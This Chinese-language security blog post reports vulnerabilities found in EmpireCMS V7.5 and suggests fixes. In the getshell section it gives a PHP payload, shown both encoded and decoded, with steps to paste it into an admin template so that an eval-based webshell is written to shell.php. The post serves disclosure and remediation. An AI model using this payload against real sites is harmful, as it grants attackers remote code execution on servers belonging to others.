網站安全檢測 對帝國CMS程式碼的後臺功能性安全測試

網站安全發表於2019-09-09

最近我們SINE安全在對帝國CMS系統進行程式碼安全審計的時候,發現該系統存在網站漏洞,受影響的版本是EmpireCMS V7.5,從帝國官方網站下載到本地,我們人工對其程式碼進行詳細的漏洞檢測與安全程式碼分析。共計發現三個高危漏洞,都是在網站的後臺管理頁面上的功能發現的。該漏洞的產生,最根源的問題是沒有對get,post提交方式進行嚴格的安全效驗與過濾,導致可以插入惡意程式碼到後端伺服器中去處理,導致漏洞的發生。

帝國CMS系統,簡單給大家介紹一下,目前很多站長,以及企業建站,都在使用該套系統,快速,便捷,易於搜尋引擎收錄,採用的是B/S架構開發,php語言+Mysql資料庫,支援大併發同時訪問,可以承載較多的使用者快速的訪問網站的各個頁面與內容,模板自定義化,可以設定標籤與自行設計網站外觀,靜態html生成,還有采集功能,深受廣大站長和網站運營者的喜歡。

我們SINE安全技術在對該程式碼進行安全檢測與滲透測試的手,會先大體看下程式碼,熟悉整個網站的架構,資料庫配置檔案,以及入口呼叫到的檔案,通常呼叫到的安全規則是如何寫的,多個方面去大體的瞭解該程式碼,目前滲透測試中,發現的網站漏洞有:SQL隱碼攻擊漏洞,網站敏感資訊洩露,初始化安裝功能漏洞,直行平行越權邏輯漏洞,任意檔案上傳漏洞,登入繞過漏洞,簡訊驗證碼漏洞,找回密碼漏洞,資料庫備份webshell,XSS跨站,CSRF漏洞等待。

網站安全檢測 對帝國CMS程式碼的後臺功能性安全測試

首先我們檢測到的是帝國安裝程式碼功能上存在可以插入惡意程式碼漏洞,在install安裝目錄下的index.php檔案中,可以查到表的字首,也就是獲取前端提交過來的引數,然後繼續往下看,data目錄下的fun.php程式碼裡的引數並沒有做任何的安全效驗,導致可以直接插入惡意程式碼寫入到配置檔案config.php中去。漏洞詳情如下圖:

網站安全檢測 對帝國CMS程式碼的後臺功能性安全測試

後臺還存在get webshell漏洞,開啟後臺管理功能頁面,選擇管理首頁模板,緊接著右鍵點選增加首頁方案中,複製漏洞exp程式碼:<?php $aa = _decode(ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA)${(system)($aa)};?> 解密後是:ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA=>echo '<?php eval($_REQUEST[hp]);'>shell.php

寫到模板內容頁面裡,左鍵點選提交,再點選啟用此方案,就在會e/admin/template/資料夾下生成一個shell.php檔案。

網站安全檢測 對帝國CMS程式碼的後臺功能性安全測試

網站安全檢測 對帝國CMS程式碼的後臺功能性安全測試

關於帝國CMS漏洞的修復辦法,對所有的get,post請求做安全過濾,也可以直接在eaddslashes2的引數裡增加惡意程式碼的攔截機制,先檢測後放行,該漏洞的利用條件是需要有後臺管理員許可權,利用的不是太多,建議對網站後臺的管理目錄進行更改,或者直接將管理員的密碼設定的複雜一些。如果您對網站漏洞修復不是太懂的話,也可以找專業的網站安全公司來處理,國內SINE安全,啟明星辰,綠盟,都是比較不錯的,網站漏洞經常出現,也請網站的運營者多多關注EmpireCMS的官方,一有補丁就立即修復掉,將安全損失降到最低。


來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/31542418/viewspace-2656504/,如需轉載,請註明出處,否則將追究法律責任。

相關文章